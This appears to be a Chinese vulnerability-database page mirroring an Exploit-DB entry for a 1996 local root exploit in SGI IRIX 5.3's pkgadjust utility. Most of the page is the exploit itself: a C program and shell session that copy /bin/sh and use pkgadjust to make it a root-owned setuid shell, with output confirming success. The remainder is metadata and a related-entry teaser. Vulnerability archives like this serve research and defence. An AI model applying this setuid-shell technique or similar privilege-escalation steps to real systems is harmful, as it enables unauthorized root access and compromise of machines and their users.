SGI IRIX 5.3 – ‘pkgadjust’ Local Privilege Escalation

SGI IRIX 5.3 – ‘pkgadjust’ Local Privilege Escalation

漏洞ID 1053343 漏洞类型
发布时间 1996-09-23 更新时间 1996-09-23
图片[1]-SGI IRIX 5.3 – ‘pkgadjust’ Local Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-SGI IRIX 5.3 – ‘pkgadjust’ Local Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 IRIX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19319
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/419/info

A vulnerability exists in the pkgadjust utility shipped with Irix 5.3 from Silicon Graphics. This vulnerability can result in the compromise of the root account. 

% cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database

updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh

相关推荐: ghostscript存在远程攻击者执行命令漏洞

ghostscript存在远程攻击者执行命令漏洞 漏洞ID 1207679 漏洞类型 未知 发布时间 1995-08-31 更新时间 1995-08-31 CVE编号 CVE-1999-0155 CNNVD-ID CNNVD-199508-005 漏洞平台 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享